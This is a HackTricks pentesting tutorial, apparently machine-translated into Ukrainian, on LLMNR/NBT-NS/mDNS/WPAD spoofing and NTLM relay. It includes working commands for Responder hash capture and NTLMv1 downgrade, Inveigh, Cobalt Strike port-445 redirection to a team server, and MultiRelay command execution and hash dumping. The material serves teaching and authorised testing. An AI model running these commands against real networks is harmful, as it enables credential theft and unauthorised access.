13 KiB
Підроблення LLMNR, NBT-NS, mDNS/DNS та WPAD та атаки релею
{% hint style="success" %}
Вивчайте та практикуйте хакінг AWS:Навчання AWS Red Team Expert (ARTE) від HackTricks
Вивчайте та практикуйте хакінг GCP: Навчання GCP Red Team Expert (GRTE) від HackTricks
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
- Поширюйте хакерські трюки, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.
Протоколи мережі
Протоколи локального вирішення хоста
- LLMNR, NBT-NS та mDNS:
- Microsoft та інші операційні системи використовують LLMNR та NBT-NS для локального вирішення імен при невдачі DNS. Так само, Apple та Linux системи використовують mDNS.
- Ці протоколи піддаються перехопленню та підробленню через їх невпізнану, розповсюджену природу через UDP.
- Responder може бути використаний для підроблення служб шляхом відправлення підроблених відповідей на хости, які запитують ці протоколи.
- Додаткову інформацію про підроблення служб за допомогою Responder можна знайти тут.
Протокол автоматичного відкриття веб-проксі (WPAD)
- WPAD дозволяє браузерам автоматично відкривати налаштування проксі.
- Відкриття здійснюється через DHCP, DNS або в разі невдачі - через LLMNR та NBT-NS.
- Responder може автоматизувати атаки WPAD, направляючи клієнтів на зловмисні сервери WPAD.
Responder для отруєння протоколів
- Responder - це інструмент, який використовується для отруєння запитів LLMNR, NBT-NS та mDNS, відповідаючи вибірково на типи запитів, переважно спрямованих на служби SMB.
- Він поставляється заздалегідь в Kali Linux, налаштовується в
/etc/responder/Responder.conf
. - Responder відображає захоплені хеші на екрані та зберігає їх у каталозі
/usr/share/responder/logs
. - Підтримує як IPv4, так і IPv6.
- Версія Responder для Windows доступна тут.
Запуск Responder
- Для запуску Responder зі стандартними налаштуваннями:
responder -I <Інтерфейс>
- Для більш агресивного сканування (з можливими побічними ефектами):
responder -I <Інтерфейс> -P -r -v
- Техніки захоплення викликів/відповідей NTLMv1 для полегшення розкриття:
responder -I <Інтерфейс> --lm --disable-ess
- Підроблення WPAD може бути активоване за допомогою:
responder -I <Інтерфейс> --wpad
- Запити NetBIOS можуть бути розрішені на IP атакуючого, і може бути налаштований аутентифікаційний проксі:
responder.py -I <інтерфейс> -Pv
Отруєння DHCP за допомогою Responder
- Підроблення відповідей DHCP може постійно отруїти інформацію маршрутизації жертви, пропонуючи більш прихований альтернативний варіант отруєння ARP.
- Це вимагає точного знання конфігурації мережі цільової мережі.
- Запуск атаки:
./Responder.py -I eth0 -Pdv
- Цей метод може ефективно захоплювати хеші NTLMv1/2, але вимагає обережного обходу для уникнення розриву мережі.
Захоплення облікових даних за допомогою Responder
- Responder буде підробляти служби за допомогою вищезгаданих протоколів, захоплюючи облікові дані (зазвичай виклик/відповідь NTLMv2), коли користувач намагається аутентифікуватися проти підроблених служб.
- Можливі спроби зниження до NetNTLMv1 або вимкнення ESS для полегшення розкриття облікових даних.
Важливо зауважити, що використання цих технік повинно бути здійснене законно та етично, забезпечуючи належну авторизацію та уникнення розриву або несанкціонованого доступу.
Inveigh
Inveigh - це інструмент для пентестерів та команд червоних команд, призначений для систем Windows. Він пропонує функціональність, схожу на Responder, виконуючи підроблення та атаки людини посередника. Інструмент еволюціонував з PowerShell скрипту до бінарного файлу C#, з Inveigh та InveighZero як основні версії. Детальні параметри та інструкції можна знайти в вікі.
Inveigh може бути запущений через PowerShell:
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
Або виконано як C# бінарний файл:
Inveigh.exe
Атака перехоплення NTLM
Ця атака використовує сеанси аутентифікації SMB для доступу до цільової машини, що надає системну оболонку у разі успіху. Основні передумови включають:
- Користувач, який аутентифікується, повинен мати локальний адміністративний доступ на пересиланому хості.
- Підпис SMB повинен бути вимкнений.
Перенаправлення та тунелювання порту 445
У випадках, коли пряме введення в мережу неможливе, потрібно перенаправити та тунелювати трафік на порту 445. Інструменти, такі як PortBender, допомагають перенаправити трафік порту 445 на інший порт, що є важливим, коли доступний локальний адміністративний доступ для завантаження драйверів.
Налаштування та робота PortBender в Cobalt Strike:
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
Інші Інструменти для Атаки NTLM Relay
- Metasploit: Налаштування з проксі, локальними та віддаленими даними хосту.
- smbrelayx: Скрипт на Python для передачі сеансів SMB та виконання команд або розгортання задніх дверей.
- MultiRelay: Інструмент з набору Responder для передачі конкретних користувачів або всіх користувачів, виконання команд або виведення хешів.
Кожен інструмент може бути налаштований на роботу через проксі-сервер SOCKS у разі необхідності, що дозволяє здійснювати атаки навіть з опосередкованим мережевим доступом.
Операція MultiRelay
MultiRelay запускається з каталогу /usr/share/responder/tools, спрямовуючи конкретні IP-адреси або користувачів.
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
Примусові входи NTLM
У Windows ви можете змусити деякі привілейовані облікові записи аутентифікуватися на довільних машинах. Прочитайте наступну сторінку, щоб дізнатися як:
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}
Посилання
- https://intrinium.com/smb-relay-attack-tutorial/
- https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
- https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
- https://intrinium.com/smb-relay-attack-tutorial/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
{% hint style="success" %}
Вивчайте та практикуйте хакінг AWS:Навчання HackTricks AWS Red Team Expert (ARTE)
Вивчайте та практикуйте хакінг GCP: Навчання HackTricks GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
- Поширюйте хакерські трюки, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.